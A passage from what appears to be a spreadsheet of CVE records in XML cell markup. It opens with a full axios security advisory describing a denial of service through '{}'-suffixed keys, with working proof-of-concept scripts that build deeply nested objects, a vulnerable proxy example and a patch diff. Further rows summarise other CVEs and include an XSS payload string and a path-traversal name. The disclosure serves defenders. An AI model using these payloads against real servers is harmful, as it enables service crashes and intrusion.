    value = JSON.stringify(value);
  }
}
```

The depth guard is in `build()`:

```js
if (depth &gt; maxDepth) {
  throw new AxiosError(
    'Object is too deeply nested (' + depth + ' levels). Max depth: ' + maxDepth,
    AxiosError.ERR_FORM_DATA_DEPTH_EXCEEDED
  );
}
```

For `{}` metatoken values, `build()` only sees the top-level property. The nested value is handed directly to native `JSON.stringify()`, which recurses internally and can throw `RangeError` before axios emits the intended `AxiosError`.

## Proof of Concept of Attack

Safe local PoC with no network I/O:

```js
import toFormData from './lib/helpers/toFormData.js';

function buildDeep(depth) {
  const head = {};
  let cur = head;

  for (let i = 0; i &lt; depth; i += 1) {
    cur.x = {};
    cur = cur.x;
  }

  return head;
}

try {
  toFormData({ 'evil{}': buildDeep(10000) });
} catch (err) {
  console.log(err.name, err.code || '', err.message);
}

// Expected affected result:
// RangeError  Maximum call stack size exceeded
```

Expected fixed behavior is an `AxiosError` with code `ERR_FORM_DATA_DEPTH_EXCEEDED`.

## Workarounds

Reject or depth-limit untrusted objects before passing them to axios serialization.

Strip or reject top-level keys ending in `{}` from untrusted objects when using axios form serialization.

For query parameters, use a custom `paramsSerializer.serialize` that enforces a depth limit.

For form bodies, construct `FormData` or `URLSearchParams` manually after validating input depth.

&lt;details&gt;
&lt;summary&gt;Original Report&lt;/summary&gt;

## Summary
The `maxDepth=100` guard added in axios 1.15.0 to fix GHSA-62hf-57xw-28j9 lives inside the `build()` recursion in `lib/helpers/toFormData.js`. The default visitor at `lib/helpers/toFormData.js:166-170` still has a top-level shortcut that calls `JSON.stringify(value)` whenever a key ends in `'{}'`, before `build()` ever sees the nested value. JSON.stringify on a deeply nested object stack-overflows with `RangeError: Maximum call stack size exceeded`, which propagates synchronously out of the axios call. The exact attacker-data flow that the original advisory described (proxy-style code that forwards client JSON into `axios({ data, params })`) still crashes the process at depth ~3000 on a default Node.js stack, despite v1.16.0 being patched.

## Details
Affected: axios 1.15.0 - 1.16.0 (every released version that carries the GHSA-62hf-57xw-28j9 fix). The bug is reachable from any code path that hits `toFormData`, which includes:

- `axios.post(url, data, { headers: { 'content-type': 'application/x-www-form-urlencoded' } })` -&gt; `defaults.transformRequest` -&gt; `toURLEncodedForm(data)` -&gt; `toFormData`
- `axios.post(url, data, { headers: { 'content-type': 'multipart/form-data' } })` -&gt; same path via `toFormData`
- `axios.get(url, { params })` -&gt; `buildURL` -&gt; `new AxiosURLSearchParams(params)` -&gt; `toFormData`

Vulnerable code, `lib/helpers/toFormData.js`:

```javascript
// 156 function defaultVisitor(value, key, path) {
// 165 if (value &amp;&amp; !path &amp;&amp; typeof value === 'object') {
// 166 if (utils.endsWith(key, '{}')) {
// 167 // eslint-disable-next-line no-param-reassign
// 168 key = metaTokens ? key : key.slice(0, -2);
// 169 // eslint-disable-next-line no-param-reassign
// 170 value = JSON.stringify(value); // &lt;-- V8 native, NOT depth-checked
// 171 } else if (...
```

`build()` later does enforce `maxDepth`:

```javascript
// 211 function build(value, path, depth = 0) {
// 212 if (utils.isUndefined(value)) return;
// 213
// 214 if (depth &gt; maxDepth) {
// 215 throw new AxiosError(
// 216 'Object is too deeply nested (' + depth + ' levels). Max depth: ' + maxDepth,
// 217 AxiosError.ERR_FORM_DATA_DEPTH_EXCEEDED
// 218 );
```

The `'{}'` shortcut runs in `defaultVisitor`, which is invoked from inside `build()` for top-level keys (the `!path` clause at line 165 means the shortcut only triggers at top level, where `path` is `undefined`). At that point `depth === 0` and the maxDepth check has already passed; the recursion-aware guard never sees the nested value because `defaultVisitor` reassigns `value = JSON.stringify(value)` and returns the rendered string straight to `formData.append`. JSON.stringify itself is recursive in V8 and stack-overflows on deeply nested objects, throwing `RangeError` synchronously.

The behaviour is independent of the `metaTokens` option: line 168 only changes whether `'{}'` stays on the key name, line 170 stringifies regardless. `toURLEncodedForm`'s wrapper visitor in `lib/helpers/toURLEncodedForm.js:11-14` falls through to the same `defaultVisitor`, so the form-encoded path is also affected.

The attacker payload is a single top-level key ending in `'{}'` whose value is a nested object. The keys themselves do not have to be deep, so the payload is small to send (a few KB of `{"x":{"x":...}}` produces enough nesting to overflow). The original advisory's threat model -- a server that forwards `req.body` or `req.query` into axios -- is unchanged:

```javascript
app.post('/forward', async (req, res) =&gt; {
 await axios.post('https://upstream/api', req.body); // req.body attacker-controlled
 res.send('ok');
});
// attacker POST /forward with content-type: application/x-www-form-urlencoded
// body: {"evil{}": &lt;8000-deep object&gt;}
// -&gt; JSON.stringify recurses inside defaultVisitor -&gt; RangeError -&gt; handler crashes
```

The error is not an `AxiosError`; it is a raw `RangeError` thrown from the stringifier, so handlers that look for `err.code === 'ERR_FORM_DATA_DEPTH_EXCEEDED'` (the documented signal that the maxDepth guard fired) do not see it. Synchronous startup paths or worker threads still take the whole process down.

The fix is to also depth-limit (or pre-walk) the value before calling `JSON.stringify` on line 170, or to remove the top-level `'{}'` shortcut and rely on the depth-checked `build()` recursion to handle it. A minimal patch that preserves observable behaviour for legal payloads:

```diff
 if (utils.endsWith(key, '{}')) {
 // eslint-disable-next-line no-param-reassign
 key = metaTokens ? key : key.slice(0, -2);
+ // Reject objects that would exceed maxDepth before handing to JSON.stringify,
+ // which is recursive in V8 and stack-overflows on deeply nested input.
+ (function checkDepth(v, d) {
+ if (d &gt; maxDepth) {
+ throw new AxiosError(
+ 'Object is too deeply nested (' + d + ' levels). Max depth: ' + maxDepth,
+ AxiosError.ERR_FORM_DATA_DEPTH_EXCEEDED
+ );
+ }
+ if (v &amp;&amp; typeof v === 'object') {
+ for (const k in v) checkDepth(v[k], d + 1);
+ }
+ })(value, 0);
 // eslint-disable-next-line no-param-reassign
 value = JSON.stringify(value);
 }
```

(The recursion in `checkDepth` itself is bounded by `maxDepth`, so it cannot itself overflow.)

## PoC
Reproduces against a clean clone of `axios/axios` at v1.16.0 with `npm install` already run. `targets/axios/poc_jsonstringify_dos.mjs` is the script:

```javascript
import axios from './source/index.js';

function buildDeep(depth) {
 let head = {};
 let cur = head;
 for (let i = 0; i &lt; depth; i++) { cur.x = {}; cur = cur.x; }
 return head;
}

const malicious = buildDeep(5000);
const safeAdapter = () =&gt; Promise.resolve({
 data: 'never reached', status: 200, statusText: 'OK', headers: {}, config: {}
});

// 1. POST x-www-form-urlencoded
try {
 await axios.post('http://example.test/x',
 { 'evil{}': malicious },
 { headers: { 'content-type': 'application/x-www-form-urlencoded' }, adapter: safeAdapter });
} catch (e) {
 console.log('POST form-encoded:', e.name, '-', e.message);
}

// 2. GET with params
try {
 await axios.get('http://example.test/x',
 { params: { 'evil{}': malicious }, adapter: safeAdapter });
} catch (e) {
 console.log('GET params:', e.name, '-', e.message);
}
```

3/3 runs reproduce the same `RangeError` on `axios@1.16.0` with Node.js 24:

```
$ node poc_jsonstringify_dos.mjs
POST form-encoded: RangeError - Maximum call stack size exceeded
GET params: RangeError - Maximum call stack size exceeded
```

`safeAdapter` is a stub that returns a fake response, so the crash is provably inside axios's serialization layer, not in HTTP I/O. Removing the `'{}'` suffix from the key and re-running gives the expected `AxiosError: Object is too deeply nested ... ERR_FORM_DATA_DEPTH_EXCEEDED` from the maxDepth guard, confirming the fix is wired correctly elsewhere -- it just does not cover this branch.

Crash threshold on a default-stack Node.js process is roughly depth 2500-3000; 8000 is comfortably above that, and the payload is a few KB.

## Impact
A remote, unauthenticated attacker who can influence an object that the application passes to axios as request `data` or `params` triggers an uncaught `RangeError` from inside the synchronous `JSON.stringify` call in `defaultVisitor`. In server-side applications that proxy or re-forward client JSON through axios -- the same threat model that motivated GHSA-62hf-57xw-28j9 -- this crashes the request handler and, in worker/cluster setups, the whole process. The previously shipped `maxDepth` guard does not stop it because the `'{}'` suffix path bypasses `build()` entirely. Same severity class as the original advisory (CWE-674 Uncontrolled Recursion, network-reachable DoS); the only difference is the attacker has to suffix one of their object keys with `'{}'` to land on the unguarded code path.
&lt;/details&gt;

---</t></is></c><c r="S1494" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67321</t></is></c></row><row r="1495"><c r="A1495" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1495" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C1495" s="5" t="inlineStr"><is><t>CVE-2026-69112</t></is></c><c r="D1495" s="5" t="n"><v>6.9</v></c><c r="E1495" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1495" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G1495" s="5" t="inlineStr" /><c r="H1495" s="5" t="n"><v>0.001</v></c><c r="I1495" s="5" t="inlineStr" /><c r="J1495" s="5" t="inlineStr" /><c r="K1495" s="5" t="inlineStr" /><c r="L1495" s="5" t="inlineStr"><is><t>pip:accelerate</t></is></c><c r="M1495" s="5" t="inlineStr" /><c r="N1495" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O1495" s="5" t="inlineStr" /><c r="P1495" s="5" t="inlineStr" /><c r="Q1495" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R1495" s="5" t="inlineStr"><is><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is></c><c r="S1495" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69112</t></is></c></row><row r="1496"><c r="A1496" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1496" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1496" s="5" t="inlineStr"><is><t>CVE-2026-73848</t></is></c><c r="D1496" s="5" t="n"><v>6.9</v></c><c r="E1496" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1496" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1496" s="5" t="inlineStr" /><c r="H1496" s="5" t="n"><v>0.003</v></c><c r="I1496" s="5" t="inlineStr" /><c r="J1496" s="5" t="inlineStr" /><c r="K1496" s="5" t="inlineStr" /><c r="L1496" s="5" t="inlineStr" /><c r="M1496" s="5" t="inlineStr" /><c r="N1496" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1496" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1496" s="5" t="inlineStr" /><c r="Q1496" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1496" s="5" t="inlineStr"><is><t>Emlog is an open source website building system. In versions 2.6.29 and prior, tag names in emlog are not HTML-encoded when rendered in the article editor. An attacker can create a tag containing ');alert(document.domain);//. The addslashes() function does not escape HTML entities, so ' is stored as-is. When the browser renders the page, it decodes ' back to a literal single quote before evaluating the JavaScript, breaking out of the string and executing arbitrary code. At time of publication, there are no publicly known patches.</t></is></c><c r="S1496" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73848</t></is></c></row><row r="1497"><c r="A1497" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1497" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1497" s="5" t="inlineStr"><is><t>CVE-2026-74235</t></is></c><c r="D1497" s="5" t="n"><v>6.9</v></c><c r="E1497" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1497" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1497" s="5" t="inlineStr" /><c r="H1497" s="5" t="n"><v>0.006</v></c><c r="I1497" s="5" t="inlineStr" /><c r="J1497" s="5" t="inlineStr" /><c r="K1497" s="5" t="inlineStr" /><c r="L1497" s="5" t="inlineStr" /><c r="M1497" s="5" t="inlineStr" /><c r="N1497" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1497" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1497" s="5" t="inlineStr" /><c r="Q1497" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R1497" s="5" t="inlineStr"><is><t>GFI Exinda AI and ClearView before 7.6.5 contains a path traversal vulnerability in the system maintenance configuration download handler. The wcf_handle_download() function accepts parameters prefixed with v_del_ and appends their values directly to the base configuration directory path without sanitizing for directory traversal sequences. An authenticated attacker with Admin privileges can read arbitrary files from the system in the context of root.</t></is></c><c r="S1497" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-74235</t></is></c></row><row r="1498"><c r="A1498" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1498" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1498" s="5" t="inlineStr"><is><t>CVE-2026-75125</t></is></c><c r="D1498" s="5" t="n"><v>6.9</v></c><c r="E1498" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1498" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1498" s="5" t="inlineStr" /><c r="H1498" s="5" t="n"><v>0.004</v></c><c r="I1498" s="5" t="inlineStr" /><c r="J1498" s="5" t="inlineStr" /><c r="K1498" s="5" t="inlineStr" /><c r="L1498" s="5" t="inlineStr" /><c r="M1498" s="5" t="inlineStr" /><c r="N1498" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1498" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P1498" s="5" t="inlineStr" /><c r="Q1498" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="R1498" s="5" t="inlineStr"><is><t>PLANET GS-4210-16P2S V3 firmware before 3.441b260626 contains an authenticated null pointer dereference vulnerability in /cgi-bin/dispatcher.cgi. The web_poe_alive_rmtip_post handler dereferences the rmtIP parameter without verifying its presence. A remote authenticated attacker can send a crafted request omitting the rmtIP parameter to cause the CGI process to dereference a null pointer and crash, resulting in denial of service of the web management interface.</t></is></c><c r="S1498" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75125</t></is></c></row><row r="1499"><c r="A1499" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1499" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1499" s="5" t="inlineStr"><is><t>CVE-2026-75126</t></is></c><c r="D1499" s="5" t="n"><v>6.9</v></c><c r="E1499" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1499" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1499" s="5" t="inlineStr" /><c r="H1499" s="5" t="n"><v>0.004</v></c><c r="I1499" s="5" t="inlineStr" /><c r="J1499" s="5" t="inlineStr" /><c r="K1499" s="5" t="inlineStr" /><c r="L1499" s="5" t="inlineStr" /><c r="M1499" s="5" t="inlineStr" /><c r="N1499" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1499" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P1499" s="5" t="inlineStr" /><c r="Q1499" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R1499" s="5" t="inlineStr"><is><t>PLANET GS-4210-16P2S V3 firmware before 3.441b260626 contains multiple authenticated stack buffer overflow vulnerabilities in /cgi-bin/dispatcher.cgi. The following handlers copy attacker-controlled POST parameters into fixed-size stack buffers without length validation: web_vlan_membership_edit_dialog_post; web_dai_vlan_post; web_poe_alive_rmtip_post; web_sys_sntp_post; web_tool_upgradeManager_post; web_port_countersClr_post; web_rmon_statisticsClr_post; web_cablediag_copper_post; web_aaa_*Authlist* handlers; web_acl_mgmt_Rules_Apply_post; web_acl_mgmt_Rules_Edit_post; web_acl_*AceDel_post handlers; web_acl_*AceAdd/Edit_post handlers; web_acl_bindAdd_post; web_acl_bindEdit_post; web_snmp_v3view_add_post; web_snmp_v3group_add_post; web_snmp_v3community_add_post; web_snmp_v3host_add_post; web_snmp_notifyv3_add_post; web_snmp_v3user_add_post; web_snmpv3_remote_engineId_add_post; web_stp_globalSetting_post; web_isg_db_post; web_tacplus*_post handlers; web_dhcp_option82_post; and web_dhcp_port_option82_cid_post. A remote authenticated attacker can send crafted requests to crash the CGI process or web management service, resulting in denial of service.</t></is></c><c r="S1499" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75126</t></is></c></row><row r="1500"><c r="A1500" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1500" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1500" s="5" t="inlineStr"><is><t>CVE-2026-75135</t></is></c><c r="D1500" s="5" t="n"><v>6.9</v></c><c r="E1500" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1500" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1500" s="5" t="inlineStr" /><c r="H1500" s="5" t="n"><v>0.001</v></c><c r="I1500" s="5" t="inlineStr" /><c r="J1500" s="5" t="inlineStr" /><c r="K1500" s="5" t="inlineStr" /><c r="L1500" s="5" t="inlineStr" /><c r="M1500" s="5" t="inlineStr" /><c r="N1500" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1500" s="5" t="inlineStr"><is><t>2026-09-02</t></is></c><c r="P1500" s="5" t="inlineStr" /><c r="Q1500" s="5" t="inlineStr"><is><t>CWE-316</t></is></c><c r="R1500" s="5" t="inlineStr"><is><t>UpSignOn for Windows before 7.19.0 contains a sensitive data exposure vulnerability that allows local attackers to recover the master password and decrypt vault contents by reading a retained backup key from the process memory of UpSignOn.exe, even after the vault has been re-locked. Attackers can extract the backup key from process memory to decrypt the encrypted master password backup stored in v6-vault1.DATA.txt, then use the recovered master password to decrypt the main vault and export all password manager entries in cleartext.</t></is></c><c r="S1500" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75135</t></is></c></row><row r="1501"><c r="A1501" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1501" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1501" s="5" t="inlineStr"><is><t>CVE-2026-75136</t></is></c><c r="D1501" s="5" t="n"><v>6.9</v></c><c r="E1501" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1501" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1501" s="5" t="inlineStr" /><c r="H1501" s="5" t="n"><v>0.001</v></c><c r="I1501" s="5" t="inlineStr" /><c r="J1501" s="5" t="inlineStr" /><c r="K1501" s="5" t="inlineStr" /><c r="L1501" s="5" t="inlineStr" /><c r="M1501" s="5" t="inlineStr" /><c r="N1501" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1501" s="5" t="inlineStr"><is><t>2026-09-02</t></is></c><c r="P1501" s="5" t="inlineStr" /><c r="Q1501" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="R1501" s="5" t="inlineStr"><is><t>UpSignOn for Windows before 7.19.0 contains an insecure credential storage vulnerability that allows local attackers to retrieve the biometric unlock key stored in the Windows PasswordVault API without triggering any authentication prompt. Attackers can access the stored biometric key from a standard local process within the same Windows session to decrypt the protected vault files and export the entire password manager contents in cleartext.</t></is></c><c r="S1501" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75136</t></is></c></row><row r="1502"><c r="A1502" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1502" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1502" s="5" t="inlineStr"><is><t>CVE-2026-75137</t></is></c><c r="D1502" s="5" t="n"><v>6.9</v></c><c r="E1502" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1502" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1502" s="5" t="inlineStr" /><c r="H1502" s="5" t="n"><v>0.001</v></c><c r="I1502" s="5" t="inlineStr" /><c r="J1502" s="5" t="inlineStr" /><c r="K1502" s="5" t="inlineStr" /><c r="L1502" s="5" t="inlineStr" /><c r="M1502" s="5" t="inlineStr" /><c r="N1502" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1502" s="5" t="inlineStr"><is><t>2026-09-02</t></is></c><c r="P1502" s="5" t="inlineStr" /><c r="Q1502" s="5" t="inlineStr"><is><t>CWE-316</t></is></c><c r="R1502" s="5" t="inlineStr"><is><t>UpSignOn for Windows before 7.19.0 contains a sensitive data exposure vulnerability that allows local attackers to recover cleartext vault data from process memory even after the application has been locked. Attackers can use the PROCESS_VM_READ permission to read the memory space of UpSignOn.exe and extract sensitive fields including entry names, URLs, usernames, passwords, TOTP secrets, and notes.</t></is></c><c r="S1502" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75137</t></is></c></row><row r="1503"><c r="A1503" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1503" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1503" s="5" t="inlineStr"><is><t>CVE-2026-75592</t></is></c><c r="D1503" s="5" t="n"><v>6.9</v></c><c r="E1503" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1503" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1503" s="5" t="inlineStr" /><c r="H1503" s="5" t="n"><v>0.005</v></c><c r="I1503" s="5" t="inlineStr" /><c r="J1503" s="5" t="inlineStr" /><c r="K1503" s="5" t="inlineStr" /><c r="L1503" s="5" t="inlineStr" /><c r="M1503" s="5" t="inlineStr" /><c r="N1503" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1503" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P1503" s="5" t="inlineStr" /><c r="Q1503" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R1503" s="5" t="inlineStr"><is><t>Kirby is an open-source content management system. Prior to 4.9.5 and 5.5.2, depending on the release line, Kirby's media handler used incomplete filesystem containment checks in src/Filesystem/Dir.php and src/Filesystem/F.php through Kirby\Filesystem\Dir::realpath() and Kirby\Filesystem\F::realpath(). The checks accepted a sibling directory whose path shared the intended root's string prefix, such as /var/www/site2 next to /var/www/site, because they did not require an exact match or a DIRECTORY_SEPARATOR boundary. A remote attacker could use Kirby\Cms\Media::thumb() to create and access thumbnails from image files in a PHP-readable sibling directory when that directory contained a valid .json thumbnail job file, potentially exposing staging sites, backups, or other internal sites and deleting the job file during processing. This issue is fixed in versions 4.9.5 and 5.5.2.</t></is></c><c r="S1503" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75592</t></is></c></row><row r="1504"><c r="A1504" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1504" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C1504" s="5" t="inlineStr"><is><t>CVE-2026-75596</t></is></c><c r="D1504" s="5" t="n"><v>6.9</v></c><c r="E1504" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1504" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G1504" s="5" t="inlineStr" /><c r="H1504" s="5" t="n"><v>0.004</v></c><c r="I1504" s="5" t="inlineStr" /><c r="J1504" s="5" t="inlineStr" /><c r="K1504" s="5" t="inlineStr" /><c r="L1504" s="5" t="inlineStr"><is><t>maven:io.netty:netty-handler</t></is></c><c r="M1504" s="5" t="inlineStr"><is><t>4.1.137.Final, 4.2.17.Final</t></is></c><c r="N1504" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O1504" s="5" t="inlineStr" /><c r="P1504" s="5" t="inlineStr" /><c r="Q1504" s="5" t="inlineStr"><is><t>CWE-407</t></is></c><c r="R1504"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S1504" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75596</t></is></c></row><row r="1505"><c r="A1505" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1505" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1505" s="5" t="inlineStr"><is><t>CVE-2026-77217</t></is></c><c r="D1505" s="5" t="n"><v>6.9</v></c><c r="E1505" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1505" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1505" s="5" t="inlineStr" /><c r="H1505" s="5" t="n"><v>0.004</v></c><c r="I1505" s="5" t="inlineStr" /><c r="J1505" s="5" t="inlineStr" /><c r="K1505" s="5" t="inlineStr" /><c r="L1505" s="5" t="inlineStr" /><c r="M1505" s="5" t="inlineStr" /><c r="N1505" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1505" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P1505" s="5" t="inlineStr" /><c r="Q1505" s="5" t="inlineStr"><is><t>CWE-121, CWE-476</t></is></c><c r="R1505" s="5" t="inlineStr"><is><t>PLANET GS-4210-16P2S V3 firmware before 3.441b260626 contains authenticated stack buffer overflow and null pointer dereference vulnerabilities in /cgi-bin/dispatcher.cgi. The web_radiusSrv*_post family of handlers copies the radKey, radKey_0, radDftParamKey, radName, and radIp POST parameters into fixed-size stack buffers without length validation, and additionally dereferences radName and radIp without verifying their presence in the request. A remote authenticated attacker can send crafted requests to crash the CGI process or web management service, resulting in denial of service.</t></is></c><c r="S1505" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77217</t></is></c></row><row r="1506"><c r="A1506" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1506" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1506" s="5" t="inlineStr"><is><t>CVE-2026-77218</t></is></c><c r="D1506" s="5" t="n"><v>6.9</v></c><c r="E1506" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1506" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1506" s="5" t="inlineStr" /><c r="H1506" s="5" t="n"><v>0.004</v></c><c r="I1506" s="5" t="inlineStr" /><c r="J1506" s="5" t="inlineStr" /><c r="K1506" s="5" t="inlineStr" /><c r="L1506" s="5" t="inlineStr" /><c r="M1506" s="5" t="inlineStr" /><c r="N1506" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1506" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P1506" s="5" t="inlineStr" /><c r="Q1506" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R1506" s="5" t="inlineStr"><is><t>PLANET GS-4210-16P2S V3 firmware before 3.441b260626 contains authenticated stack buffer overflow vulnerabilities in /cgi-bin/dispatcher.cgi. The web_login_first_post handler copies the usrPass POST parameter into a fixed-size stack buffer without length validation, the web_sys_enablePasswd_post handler copies the enbPass POST parameter into a fixed-size stack buffer without length validation, and the web_sys_localUser_post handler copies the usrName and usrPass POST parameters into fixed-size stack buffers without length validation. A remote authenticated attacker can send a crafted request to crash the CGI process or web management service, resulting in denial of service.</t></is></c><c r="S1506" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77218</t></is></c></row><row r="1507"><c r="A1507" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1507" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1507" s="5" t="inlineStr"><is><t>CVE-2026-79743</t></is></c><c r="D1507" s="5" t="n"><v>6.9</v></c><c r="E1507" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1507" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1507" s="5" t="inlineStr" /><c r="H1507" s="5" t="n"><v>0.004</v></c><c r="I1507" s="5" t="inlineStr" /><c r="J1507" s="5" t="inlineStr" /><c r="K1507" s="5" t="inlineStr" /><c r="L1507" s="5" t="inlineStr" /><c r="M1507" s="5" t="inlineStr" /><c r="N1507" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1507" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P1507" s="5" t="inlineStr" /><c r="Q1507" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R1507" s="5" t="inlineStr"><is><t>MCPHub is a unified hub for centrally managing and dynamically orchestrating multiple MCP servers/APIs into separate endpoints with flexible routing strategies. Prior to version 0.12.13, MCPB File Upload Handler extracts a ZIP file and reads manifest.json from it. The name field in the manifest is directly concatenated into a file path (line 107) without any sanitization or path traversal character validation. An attacker can craft a malicious MCPB file where manifest.name is set to something like ../../../etc/malicious, causing the file to be extracted to an arbitrary location on the file system. The cleanupOldMcpbServer function (line 110) also uses the unsanitized name, potentially allowing deletion of arbitrary directories. This issue has been patched in version 0.12.13.</t></is></c><c r="S1507" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79743</t></is></c></row><row r="1508"><c r="A1508" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1508" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1508" s="5" t="inlineStr"><is><t>CVE-2026-81531</t></is></c><c r="D1508" s="5" t="n"><v>6.9</v></c><c r="E1508" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1508" s="5" t="inlineStr"><is><t>f23511db-6c3e-4e32-a477-6aa17d310630</t></is></c><c r="G1508" s="5" t="inlineStr" /><c r="H1508" s="5" t="n"><v>0.004</v></c><c r="I1508" s="5" t="inlineStr" /><c r="J1508" s="5" t="inlineStr" /><c r="K1508" s="5" t="inlineStr" /><c r="L1508" s="5" t="inlineStr" /><c r="M1508" s="5" t="inlineStr" /><c r="N1508" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1508" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1508" s="5" t="inlineStr" /><c r="Q1508" s="5" t="inlineStr"><is><t>CWE-200</t></is></c><c r="R1508" s="5" t="inlineStr"><is><t>An information
disclosure vulnerability has been identified in Omada Controller.  An API endpoint intended for Controller initialization
remains accessible after completion and may disclose account-related
information to unauthenticated remote users. 






Successful
